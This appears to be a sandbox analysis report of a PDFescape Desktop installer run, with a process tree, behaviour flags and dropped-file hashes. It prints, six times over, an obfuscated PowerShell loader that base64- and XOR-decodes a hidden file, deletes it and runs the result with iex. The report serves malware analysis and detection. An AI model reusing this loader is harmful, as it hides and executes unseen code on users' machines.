C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$159366958779e153824eed62df259da4='C:\Users\Admin\88f63d2f673a2f59fd0b380d98276b1f\e4cbd61aecb4f71bff7acbd0859e0141\86d6a24bd2f5fea508a694b6073c3446\d45af05453ed762ae6cc225b979ee648\721d5653b9a74b948ed452804511a77c\99cee2637dca1f106ad3cb2e055a4410\7d62f5b0569657d51524ad8f4ca1f70e';$2c79dd0ee971576f89f8beb451a866db='oPJROKHhaUCFMfeWdVpDQBZAigtmxkNnvjbzsLrcEuYTGXIwlyqS';$f96bff001b43bef5a246eac05f9f597d=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($159366958779e153824eed62df259da4));remove-item $159366958779e153824eed62df259da4;for($i=0;$i -lt $f96bff001b43bef5a246eac05f9f597d.count;){for($j=0;$j -lt $2c79dd0ee971576f89f8beb451a866db.length;$j++){$f96bff001b43bef5a246eac05f9f597d[$i]=$f96bff001b43bef5a246eac05f9f597d[$i] -bxor $2c79dd0ee971576f89f8beb451a866db[$j];$i++;if($i -ge $f96bff001b43bef5a246eac05f9f597d.count){$j=$2c79dd0ee971576f89f8beb451a866db.length}}};$f96bff001b43bef5a246eac05f9f597d=[System.Text.Encoding]::UTF8.GetString($f96bff001b43bef5a246eac05f9f597d);iex $f96bff001b43bef5a246eac05f9f597d;"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$159366958779e153824eed62df259da4='C:\Users\Admin\88f63d2f673a2f59fd0b380d98276b1f\e4cbd61aecb4f71bff7acbd0859e0141\86d6a24bd2f5fea508a694b6073c3446\d45af05453ed762ae6cc225b979ee648\721d5653b9a74b948ed452804511a77c\99cee2637dca1f106ad3cb2e055a4410\7d62f5b0569657d51524ad8f4ca1f70e';$2c79dd0ee971576f89f8beb451a866db='oPJROKHhaUCFMfeWdVpDQBZAigtmxkNnvjbzsLrcEuYTGXIwlyqS';$f96bff001b43bef5a246eac05f9f597d=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($159366958779e153824eed62df259da4));remove-item $159366958779e153824eed62df259da4;for($i=0;$i -lt $f96bff001b43bef5a246eac05f9f597d.count;){for($j=0;$j -lt $2c79dd0ee971576f89f8beb451a866db.length;$j++){$f96bff001b43bef5a246eac05f9f597d[$i]=$f96bff001b43bef5a246eac05f9f597d[$i] -bxor $2c79dd0ee971576f89f8beb451a866db[$j];$i++;if($i -ge $f96bff001b43bef5a246eac05f9f597d.count){$j=$2c79dd0ee971576f89f8beb451a866db.length}}};$f96bff001b43bef5a246eac05f9f597d=[System.Text.Encoding]::UTF8.GetString($f96bff001b43bef5a246eac05f9f597d);iex $f96bff001b43bef5a246eac05f9f597d;"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$159366958779e153824eed62df259da4='C:\Users\Admin\88f63d2f673a2f59fd0b380d98276b1f\e4cbd61aecb4f71bff7acbd0859e0141\86d6a24bd2f5fea508a694b6073c3446\d45af05453ed762ae6cc225b979ee648\721d5653b9a74b948ed452804511a77c\99cee2637dca1f106ad3cb2e055a4410\7d62f5b0569657d51524ad8f4ca1f70e';$2c79dd0ee971576f89f8beb451a866db='oPJROKHhaUCFMfeWdVpDQBZAigtmxkNnvjbzsLrcEuYTGXIwlyqS';$f96bff001b43bef5a246eac05f9f597d=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($159366958779e153824eed62df259da4));remove-item $159366958779e153824eed62df259da4;for($i=0;$i -lt $f96bff001b43bef5a246eac05f9f597d.count;){for($j=0;$j -lt $2c79dd0ee971576f89f8beb451a866db.length;$j++){$f96bff001b43bef5a246eac05f9f597d[$i]=$f96bff001b43bef5a246eac05f9f597d[$i] -bxor $2c79dd0ee971576f89f8beb451a866db[$j];$i++;if($i -ge $f96bff001b43bef5a246eac05f9f597d.count){$j=$2c79dd0ee971576f89f8beb451a866db.length}}};$f96bff001b43bef5a246eac05f9f597d=[System.Text.Encoding]::UTF8.GetString($f96bff001b43bef5a246eac05f9f597d);iex $f96bff001b43bef5a246eac05f9f597d;"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$159366958779e153824eed62df259da4='C:\Users\Admin\88f63d2f673a2f59fd0b380d98276b1f\e4cbd61aecb4f71bff7acbd0859e0141\86d6a24bd2f5fea508a694b6073c3446\d45af05453ed762ae6cc225b979ee648\721d5653b9a74b948ed452804511a77c\99cee2637dca1f106ad3cb2e055a4410\7d62f5b0569657d51524ad8f4ca1f70e';$2c79dd0ee971576f89f8beb451a866db='oPJROKHhaUCFMfeWdVpDQBZAigtmxkNnvjbzsLrcEuYTGXIwlyqS';$f96bff001b43bef5a246eac05f9f597d=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($159366958779e153824eed62df259da4));remove-item $159366958779e153824eed62df259da4;for($i=0;$i -lt $f96bff001b43bef5a246eac05f9f597d.count;){for($j=0;$j -lt $2c79dd0ee971576f89f8beb451a866db.length;$j++){$f96bff001b43bef5a246eac05f9f597d[$i]=$f96bff001b43bef5a246eac05f9f597d[$i] -bxor $2c79dd0ee971576f89f8beb451a866db[$j];$i++;if($i -ge $f96bff001b43bef5a246eac05f9f597d.count){$j=$2c79dd0ee971576f89f8beb451a866db.length}}};$f96bff001b43bef5a246eac05f9f597d=[System.Text.Encoding]::UTF8.GetString($f96bff001b43bef5a246eac05f9f597d);iex $f96bff001b43bef5a246eac05f9f597d;"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$159366958779e153824eed62df259da4='C:\Users\Admin\88f63d2f673a2f59fd0b380d98276b1f\e4cbd61aecb4f71bff7acbd0859e0141\86d6a24bd2f5fea508a694b6073c3446\d45af05453ed762ae6cc225b979ee648\721d5653b9a74b948ed452804511a77c\99cee2637dca1f106ad3cb2e055a4410\7d62f5b0569657d51524ad8f4ca1f70e';$2c79dd0ee971576f89f8beb451a866db='oPJROKHhaUCFMfeWdVpDQBZAigtmxkNnvjbzsLrcEuYTGXIwlyqS';$f96bff001b43bef5a246eac05f9f597d=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($159366958779e153824eed62df259da4));remove-item $159366958779e153824eed62df259da4;for($i=0;$i -lt $f96bff001b43bef5a246eac05f9f597d.count;){for($j=0;$j -lt $2c79dd0ee971576f89f8beb451a866db.length;$j++){$f96bff001b43bef5a246eac05f9f597d[$i]=$f96bff001b43bef5a246eac05f9f597d[$i] -bxor $2c79dd0ee971576f89f8beb451a866db[$j];$i++;if($i -ge $f96bff001b43bef5a246eac05f9f597d.count){$j=$2c79dd0ee971576f89f8beb451a866db.length}}};$f96bff001b43bef5a246eac05f9f597d=[System.Text.Encoding]::UTF8.GetString($f96bff001b43bef5a246eac05f9f597d);iex $f96bff001b43bef5a246eac05f9f597d;"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$159366958779e153824eed62df259da4='C:\Users\Admin\88f63d2f673a2f59fd0b380d98276b1f\e4cbd61aecb4f71bff7acbd0859e0141\86d6a24bd2f5fea508a694b6073c3446\d45af05453ed762ae6cc225b979ee648\721d5653b9a74b948ed452804511a77c\99cee2637dca1f106ad3cb2e055a4410\7d62f5b0569657d51524ad8f4ca1f70e';$2c79dd0ee971576f89f8beb451a866db='oPJROKHhaUCFMfeWdVpDQBZAigtmxkNnvjbzsLrcEuYTGXIwlyqS';$f96bff001b43bef5a246eac05f9f597d=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($159366958779e153824eed62df259da4));remove-item $159366958779e153824eed62df259da4;for($i=0;$i -lt $f96bff001b43bef5a246eac05f9f597d.count;){for($j=0;$j -lt $2c79dd0ee971576f89f8beb451a866db.length;$j++){$f96bff001b43bef5a246eac05f9f597d[$i]=$f96bff001b43bef5a246eac05f9f597d[$i] -bxor $2c79dd0ee971576f89f8beb451a866db[$j];$i++;if($i -ge $f96bff001b43bef5a246eac05f9f597d.count){$j=$2c79dd0ee971576f89f8beb451a866db.length}}};$f96bff001b43bef5a246eac05f9f597d=[System.Text.Encoding]::UTF8.GetString($f96bff001b43bef5a246eac05f9f597d);iex $f96bff001b43bef5a246eac05f9f597d;"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\DllHost.exeC:\Windows\SysWOW64\DllHost.exe /Processid:{2BC47158-F746-4E22-B116-D481B09E9674}1⤵
- Loads dropped DLL
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in System32 directory
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\srtasks.exeC:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:22⤵
-
C:\Windows\System32\MsiExec.exe"C:\Windows\System32\MsiExec.exe" /Y "C:\Program Files\PDFescape Desktop\preview-handler.dll"2⤵
- Loads dropped DLL
- Modifies registry class
-
C:\Windows\System32\MsiExec.exe"C:\Windows\System32\MsiExec.exe" /Y "C:\Program Files\PDFescape Desktop\thumbnail-handler.dll"2⤵
- Loads dropped DLL
-
C:\Windows\System32\MsiExec.exe"C:\Windows\System32\MsiExec.exe" /Y "C:\Program Files\PDFescape Desktop\context-menu.dll"2⤵
- Loads dropped DLL
- Modifies registry class
-
C:\Windows\syswow64\MsiExec.exe"C:\Windows\syswow64\MsiExec.exe" /Y "C:\Program Files (x86)\PDFescape Desktop\pdfactivedoc.dll"2⤵
- Loads dropped DLL
- Modifies Internet Explorer settings
- Modifies registry class
-
C:\Program Files\PDFescape Desktop\ws.exe"C:\Program Files\PDFescape Desktop\ws.exe" -service2⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies registry class
-
C:\Windows\System32\MsiExec.exeC:\Windows\System32\MsiExec.exe -Embedding 1C738FF4F03AEC73B7A07AC7D5F69CD3 E Global\MSI00002⤵
- Loads dropped DLL
-
C:\Program Files\PDFescape Desktop\updater-ws.exe"C:\Program Files\PDFescape Desktop\updater-ws.exe" -service2⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies registry class
-
C:\Windows\System32\MsiExec.exe"C:\Windows\System32\MsiExec.exe" /Y "C:\Program Files\PDFescape Desktop\creator\plugins\IEAddin\creator-ie-helper.dll"2⤵
- Loads dropped DLL
- Modifies registry class
-
C:\Windows\System32\MsiExec.exe"C:\Windows\System32\MsiExec.exe" /Y "C:\Program Files\PDFescape Desktop\creator\plugins\IEAddin\creator-ie-plugin.dll"2⤵
- Loads dropped DLL
- Modifies Internet Explorer settings
- Modifies registry class
-
C:\Windows\System32\MsiExec.exe"C:\Windows\System32\MsiExec.exe" /Y "C:\Program Files\PDFescape Desktop\creator\plugins\OfficeAddin\creator-word-plugin.dll"2⤵
- Loads dropped DLL
- Modifies registry class
-
C:\Windows\System32\MsiExec.exe"C:\Windows\System32\MsiExec.exe" /Y "C:\Program Files\PDFescape Desktop\creator\plugins\OfficeAddin\creator-excel-plugin.dll"2⤵
- Loads dropped DLL
- Modifies registry class
-
C:\Windows\System32\MsiExec.exe"C:\Windows\System32\MsiExec.exe" /Y "C:\Program Files\PDFescape Desktop\creator\plugins\OfficeAddin\creator-powerpoint-plugin.dll"2⤵
- Loads dropped DLL
-
C:\Windows\syswow64\MsiExec.exe"C:\Windows\syswow64\MsiExec.exe" /Y "C:\Program Files (x86)\PDFescape Desktop\creator\plugins\IEAddin\creator-ie-helper.dll"2⤵
- Loads dropped DLL
- Modifies registry class
-
C:\Windows\syswow64\MsiExec.exe"C:\Windows\syswow64\MsiExec.exe" /Y "C:\Program Files (x86)\PDFescape Desktop\creator\plugins\IEAddin\creator-ie-plugin.dll"2⤵
- Loads dropped DLL
- Modifies Internet Explorer settings
- Modifies registry class
-
C:\Program Files\PDFescape Desktop\creator\common\printer-installer-app.exe"C:\Program Files\PDFescape Desktop\creator\common\printer-installer-app.exe" -i "C:\Program Files\PDFescape Desktop\creator\common"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Program Files\PDFescape Desktop\creator\common\creator-app.exe"C:\Program Files\PDFescape Desktop\creator\common\creator-app.exe" -regserver2⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Program Files\PDFescape Desktop\creator\common\creator-ws.exe"C:\Program Files\PDFescape Desktop\creator\common\creator-ws.exe" -service2⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies registry class
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s DsmSvc1⤵
- Checks SCSI registry key(s)
- Modifies data under HKEY_USERS
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵
- Loads dropped DLL
- Drops file in System32 directory
- Checks SCSI registry key(s)
- Modifies data under HKEY_USERS
-
C:\Program Files\PDFescape Desktop\escape.exe"C:\Program Files\PDFescape Desktop\escape.exe"1⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Program Files\PDFescape Desktop\ws.exe"C:\Program Files\PDFescape Desktop\ws.exe"1⤵
- Executes dropped EXE
- Modifies registry class
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files (x86)\PDFescape Desktop\pdfactivedoc.dllMD5
a733c1f89219252497e94cbc66272478
SHA1f5f9be9a2345f6dc0414c3b62b4087faa32ce351
SHA256557bb1a545eac9c352dbbe15fbf383d29c6b2640b8cf74e49fefcdee97270547
SHA512875b4958cadbd8901f4fcb6c5c12f24e2112dbd287975134c6f83573d6ce679be0058dc259ab1db31a64dc48470622c80e75555e43a240e63854df859b65e0bd
-
C:\Program Files\PDFescape Desktop\atom.dllMD5
9148f07e6dedce3e8e6a642fba0402d8
SHA12e403f6b65bf4519d0883ebb0025d77130105a1c
SHA25635bd82d881759b2aa8ef6dc6e26d0943a19593b2192d207b4440c6e1a29ba05a
SHA5128f7ab028af2b782df35bf9940a8f367ac49f015d8302242d553e9437882b1fb76ebc91f3dfe2faadd2cde07af260e8ad140e3a59f0f44c05188ebf2bcfe016cb
-
C:\Program Files\PDFescape Desktop\brand.dllMD5
594a3e3adcf139e7b20eddd1f16131d3
SHA17700c89b10e779fc6db72b42be0a81fe89378f9a
SHA25652163973b0cf8d46bcd1fb26c58f8ab2f7b31fb7e2b05ded2b59ae8d4e2332ad
SHA512d1240865fc5bfcd0c17205ce866be49b76ae31fccaaa724859822a6311e0e5bb6df2642b5659c1ad20414d79c6c9abbe74419ad4474fa71cbc4e8cab57d0c7cc
-
C:\Program Files\PDFescape Desktop\context-menu.dllMD5
2c9f26866787b200996d99ad160be2b2
SHA1fec80f5b4a6acf29f74a2bc8918298518a487597
SHA2564e3a2ed474ffdb02b4a177cd748cdb31b63f1f1fe3c32bf64cedfc06b6528a57
SHA5129ade4951f2297ad233bbd41103c8a686a6098cdb2f88ad63eec8742e3bacb85fc02357a58163139259274ed6f3a1299d07b7b7db43bf8eb539c1e0fec018d6dd
-
C:\Program Files\PDFescape Desktop\encoding-conversion.dllMD5
448a6de619faf0f403c897b142f619c5
SHA1e76953f8ee3c207b44d2e7c92eaabd5e6deee4d2
SHA25600a91d382e5e4a04071b208e4717c0f53e7d7146db1ab542f3fb3358f8aa4c51
SHA512f4e450e63a7105796fe78d90731c62804cf2ee5d2ac706525684b5c4eb20552126d1a2393acb5d5b4ee59ca4a4429aab9403510aa7947b2ef6f3eb36cbd3348d
-
C:\Program Files\PDFescape Desktop\libcrypto-1_1-x64.dllMD5
ff8eff50eb5617340e3deedbcdf6e631
SHA191ebda9ef152340d68b94c7b853f97c806cb3d58
SHA256f1dd94b6e80e0ab91c7124d9a5ed37bcd70a61ba28721d3247e816de669c3f16
SHA512c1f889bc348552a46a25c18abe7633b73feb5e59c39db891bae43b5e25adbb96a5bcb259728911cb9b067b530633115027fb02f46ae684096189331ca2d1a2de
-
C:\Program Files\PDFescape Desktop\libcurl.dllMD5
140cdda2f51d89dc194a8b8c3ab9e463
SHA1255180975a70d00d31d516ecc895e42fd18c24bf
SHA256a30c086bb16c702985df2193d1e52cfb15b978a679de014b449a95eb9a233c15
SHA5125065efa34b3289be247a5bc3f677afae7a86753fc37f816da70d54d1986b6dfe8cc73ad13900020a99fec7de71bd4d23e02bf73fab6be220db1c65482ca860a4
-
C:\Program Files\PDFescape Desktop\libssl-1_1-x64.dllMD5
62dc606e7f85f8f15a582a045e394d19
SHA1bad647ebb9207e2b20d464c6b420c84b971519d2
SHA2567a91d83167c864b5381667370b95fe6081290c61356c90def9a25cf7b3d9c411
SHA512d7e8c1e9abf695db2b1038c5231ccbc3c2cfd89171e4df3d7a13d8979c096772feace7dacbbb347a657e4e5519240813f8953b75c80259cd256245a9ef2f7e8f
-
C:\Program Files\PDFescape Desktop\pdfcore.dllMD5
c10d1adf13c2edde02e6adf49d1c900b
SHA14455fc9f229dedf4dd5622e6675c7a03ac8bd4d6
SHA2566e028640b313e136a28c77245700a5b2a604935fc55f4454888192b685081d44
SHA5120768d3372e652282d3cd0e5fa9e697949d682fa4e3c9ee8d70461588baa07243271129ec5b300c1893820fddaafda12867605c1c5858d57efa9e3fd65ca28fbe
-
C:\Program Files\PDFescape Desktop\pdfgraphics.dllMD5
1fc38631bf08eff07e8466f69ce90a46
SHA13973584e1371dfb26ae31cb4b555c972bd30f5a4
SHA25678c09e4d384f1b3df9e9e00798f5f048b41866af5e0c16b7e463e6bdd695ec89
SHA5125818d9f22cf865c12b08f684cb3cced4f55036f78df36d88cdb2530134f3db3170729b1212598ce6371c67ddd9eb887ff3e1fc551c258ee0ce3bd722529a63db
-
C:\Program Files\PDFescape Desktop\pdfview.dllMD5
40ca796430abed5d369f0781af26481e
SHA149abef703e2c9c70e691d8971505691402c2e745
SHA256e303c331da06258aa0f726ae95dc51f65bb3de88e8fa431a7542e867e208ad19
SHA51238a5be054afaddc28345860f23bb5824d8079b27d97862917a345460de7c131b8fbf41451248cc7efd60596cd5e0202160c9710992bac073b88b2b83074fa5b8
-
C:\Program Files\PDFescape Desktop\preview-handler.dllMD5
0a58eba4b339c0bb6f44a314ee06d7c7
SHA1136b337a2c80fce2e4c0732fe5c821d58aad7d40
SHA25632dbc446d09e062568989bace5cc19772e2dbeccec681dd8f38ef27cf5aab47a
SHA51218d664f0242412a2e0acece5a7a8de5f1be6816b80b5665192bab2d2868e682ef43cd275d8be276ef909663bd11233c972c5f7856a32663f3876ca5a8475ad85
-
C:\Program Files\PDFescape Desktop\root-service-provider.dllMD5
58c639f842629bf97596add29b0ad19c
SHA1059b152148a8fb92f9b8f119fa95608240ea2957
SHA25640b0061cec34d9e7ce84b01a3d30e9d7eb2bcd71b9110b06680767ec7f9da503
SHA512f304dd099df5e63ebea6f87a27b718bf7f1d7b995f77ea9cb0cbcbdc621d999eb5a1eca76b50a6e96a7e5e8d136e050fdcd04b9894743f254665537e35ad473a
-
C:\Program Files\PDFescape Desktop\thumbnail-handler.dllMD5
5c467cd8042003e71597dccb53a03bfb
SHA1134db7349cfc485ee5f32b9583210843e02acdda
SHA2562f6c64fe4b3c69d4f2235a461d74497e37c0eb3fb2432191370c2430848d5c85
SHA512b1782bd052e98cfd026067992180764965fcfec3c9b840512d522f0ed2278920616ac292d6332b9be0b5829c33bcabc4409bc0fceafe17290b1b13cc3a67dd99
-
C:\Program Files\PDFescape Desktop\ws.exeMD5
c86fef0f4c86065fda9368fe5a1043d0
SHA19c858857549675608c933b980d2f74c0ffaaa769
SHA256f88a861823f995c48ddb7afe8f4be90a5d1ea5deff3df0b0c152fa0e5c2f1b65
SHA5124674d73eee0741a8faf992e55214a0471702031d6fc922ee8e141750f385169be773d2610f608ed513764359fe1c1f8ed9d2602ff34b346e88bcaf321015b812
-
C:\Program Files\PDFescape Desktop\ws.exeMD5
c86fef0f4c86065fda9368fe5a1043d0
SHA19c858857549675608c933b980d2f74c0ffaaa769
SHA256f88a861823f995c48ddb7afe8f4be90a5d1ea5deff3df0b0c152fa0e5c2f1b65
SHA5124674d73eee0741a8faf992e55214a0471702031d6fc922ee8e141750f385169be773d2610f608ed513764359fe1c1f8ed9d2602ff34b346e88bcaf321015b812
-
C:\ProgramData\PDFescape Desktop\Installation\PDFescapeDesktopInstaller.exeMD5
87d28b3d2df1cab3711bf8d3b5b520c2
SHA11987a4bf2a37f6538c701461357a52b0bce1b980
SHA25688472e266efd1a24182cf902e34e9d6b08a7b5e301be837343ffd34fe5560977
SHA51219226f61925328a990f6a8d7416d1047f395fcb9f2bbd3bc5d7af4b1d0e40b54cecd501f92ba885976ec790c1b397f21814116b8a6d6073d01a58d8d6f1a9de4
-
C:\ProgramData\PDFescape Desktop\Installation\PDFescapeDesktopInstaller.exeMD5
87d28b3d2df1cab3711bf8d3b5b520c2
SHA11987a4bf2a37f6538c701461357a52b0bce1b980
SHA25688472e266efd1a24182cf902e34e9d6b08a7b5e301be837343ffd34fe5560977
SHA51219226f61925328a990f6a8d7416d1047f395fcb9f2bbd3bc5d7af4b1d0e40b54cecd501f92ba885976ec790c1b397f21814116b8a6d6073d01a58d8d6f1a9de4
-
C:\ProgramData\PDFescape Desktop\Installation\Statistics.dllMD5
e5a591c125fdf21381cf543ed7706c66
SHA10baad9f119616ce5d0d39d4cdc9c884c1002a24e
SHA25615b8775a3bae497325056103db0b14842fa8ae5592dcaacd9cce593099f5dee6
SHA51220e3e0e45db7cff82b665ef28621a1a4071aadc97ec7167a7e47cf5dc7669c709932f3a3f1c7d2cd6b0a75dd7d0b42c4fac2ceabe5b074d7a338da1f9e061c35
-
C:\ProgramData\PDFescape Desktop\Installation\pdfescape-desktop-startup-4.0.24.4617-x64.msiMD5
692a85c10d2e69d290a14aef95aae86f
SHA1381b06c12ac1fdcb1aaef79eb376b1f8d8f1c0e1
SHA25665f598aef6b4ff4cdd5efe63ad7d91f5014c53c5afbfc20e215e7427cc84a84d
SHA51238a67af0d1f593680e3da8e920ce9bf0e831168aebf4be2fc0fca34835d43e809103316b3cdaf71156aeea72139e0285eecefa6d391c4af2b9ea55745ec0d933
-
C:\Users\Admin\88f63d2f673a2f59fd0b380d98276b1f\e4cbd61aecb4f71bff7acbd0859e0141\86d6a24bd2f5fea508a694b6073c3446\d45af05453ed762ae6cc225b979ee648\721d5653b9a74b948ed452804511a77c\99cee2637dca1f106ad3cb2e055a4410\7d62f5b0569657d51524ad8f4ca1f70eMD5
f49af433f9076c15cab2d858be35b939
SHA119fb76407184356e82560714f225a323ec19abc9
SHA256c9a510a5ea2d8575aa2f33691de5bae9c6086a5ced125a8ca1d6cb41463a5154
SHA51289163a3cd141906d559711a31a42e0153715eb54c9f5ec25395f34ab338270d98723e0e4bbad57a34440a49886194e58beb0048cd7c4cf9e432ffbaab52fe40c
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\42B9A473B4DAF01285A36B4D3C7B1662_178C086B699FD6C56B804AF3EF759CB5MD5
01ac3f2e5e3ba987a99a75e476a0e4ea
SHA15f13b2ff32953265779fcd993e938c6a6f17d000
SHA256529bac0f2e2aaccdb5ad7f778f7c1e786e76927e83af8d89de0120871ecdc604
SHA512fa2015732571b3f3a2a7ae7dc2fd8f98367f699090aa4a3ade4eae00e4451996a2a5c9a1287d2c853adefd4b96ccd9ecd42e51073aeb3c29379d42985b9c3b5f
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\66AE3BFDF94A732B262342AD2154B86E_ACB5A342F7DC5D176FB6290AA1E0F299MD5
3a988bae257d280c4de52b1f0cfdcd11
SHA1e33a9b3005c5f186d96380fec6363eb8c6b1aca2
SHA256436c4b5ad41c6d6ed8284be6d68c207bdea9798d20c47547fd3ea42b1c55d851
SHA512c808ed8d35205f491c5d6ca7fd2d6ab2bb8ae218b7300a4e3638c726fd66bde7591929375d2646e88c2acc3cc4c5d5624e5566438e05be98e417568ec98d2f04
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\42B9A473B4DAF01285A36B4D3C7B1662_178C086B699FD6C56B804AF3EF759CB5MD5
a8eb3605475e9ffca3f23873e0d01389
SHA10c7c03393f1ec9ae8f36d2f71a65f92740a8bd49
SHA256abfeff7608cd7c08ebdf3a18c4555c3d1d41a9132e47d430304957e8c8d55e5c
SHA512ecb2bdf7226634a2d20def175e6526800474f3fd3f25dbff1510bcf01b7bb4e488f2db1b05f9514e9cafb2e8d8848416ac6323bb30be96a298e3e3438d6eeeab
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\66AE3BFDF94A732B262342AD2154B86E_ACB5A342F7DC5D176FB6290AA1E0F299MD5
d6f9074c610bf98ec7835f309485119c
SHA1a86671fcdc38908f07804bb9cc46556dd76332c0
SHA256a8cd9fb26e405e3ffc60fcee4707aed04c37237128919ea440f4ea4b3ec9d883
SHA512409c724d4091e9cc601b096260032e8315d04208a5d00a8ca83ea0a91f1d60991c8ba59e76a16881899f845c5a51e12086917660a17390cb99cc2a4a27f648b8
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.logMD5
e71a0a7e48b10bde0a9c54387762f33e
SHA1fed75947f1163b00096e24a46e67d9c21e7eeebd
SHA25683d7be67d0eb544d655cc8e8eb687c26f772d6a40ebf8394e5c12b248976a2de
SHA512394c25daef6143de894505189b1edcdffb82fd6ab9de1c9e43865fb790803ff5c384debfe16236d4a9d95a78d3eea548d3cef332ed5a6881ac9c50d252c3c34a
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheMD5
c2d06c11dd1f1a8b1dedc1a311ca8cdc
SHA175c07243f9cb80a9c7aed2865f9c5192cc920e7e
SHA25691ac15f1f176f74f02ce89ecdc443d8e33e0064c7bc69a87c7b2da145449d586
SHA512db00860292c3e7430b1534f459c2f0f9778df3a94c51d622dcf1cde390a5539bdc6d60a0d41e6f1ed99a989f17ecb109abd4c17faac4cd398945536f1d0ebb4d
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheMD5
c2d06c11dd1f1a8b1dedc1a311ca8cdc
SHA175c07243f9cb80a9c7aed2865f9c5192cc920e7e
SHA25691ac15f1f176f74f02ce89ecdc443d8e33e0064c7bc69a87c7b2da145449d586
SHA512db00860292c3e7430b1534f459c2f0f9778df3a94c51d622dcf1cde390a5539bdc6d60a0d41e6f1ed99a989f17ecb109abd4c17faac4cd398945536f1d0ebb4d
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheMD5
c2d06c11dd1f1a8b1dedc1a311ca8cdc
SHA175c07243f9cb80a9c7aed2865f9c5192cc920e7e
SHA25691ac15f1f176f74f02ce89ecdc443d8e33e0064c7bc69a87c7b2da145449d586
SHA512db00860292c3e7430b1534f459c2f0f9778df3a94c51d622dcf1cde390a5539bdc6d60a0d41e6f1ed99a989f17ecb109abd4c17faac4cd398945536f1d0ebb4d
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheMD5
c2d06c11dd1f1a8b1dedc1a311ca8cdc
SHA175c07243f9cb80a9c7aed2865f9c5192cc920e7e
SHA25691ac15f1f176f74f02ce89ecdc443d8e33e0064c7bc69a87c7b2da145449d586
SHA512db00860292c3e7430b1534f459c2f0f9778df3a94c51d622dcf1cde390a5539bdc6d60a0d41e6f1ed99a989f17ecb109abd4c17faac4cd398945536f1d0ebb4d
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheMD5
c2d06c11dd1f1a8b1dedc1a311ca8cdc
SHA175c07243f9cb80a9c7aed2865f9c5192cc920e7e
